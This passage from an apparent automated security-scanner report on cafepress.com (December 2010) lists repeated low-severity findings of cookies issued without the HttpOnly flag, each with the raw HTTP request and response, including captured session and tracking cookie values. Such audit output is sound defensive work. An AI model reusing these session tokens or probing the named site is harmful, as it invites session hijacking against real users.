__utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59018 Date: Sun, 26 Dec 2010 13:48:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.24. http://www.cafepress.com/+license_plate_frames
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+license_plate_frames
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59931 Date: Sun, 26 Dec 2010 13:48:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59931 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.25. http://www.cafepress.com/+magnets
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+magnets
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59159 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59159 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.26. http://www.cafepress.com/+mousepads
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+mousepads
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 56857 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56857 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.27. http://www.cafepress.com/+mugs
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+mugs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 60077 Date: Sun, 26 Dec 2010 13:47:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60077 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.28. http://www.cafepress.com/+ornaments
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+ornaments
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 58964
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.29. http://www.cafepress.com/+posters
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+posters
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 65598
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.30. http://www.cafepress.com/+stadium-blanket
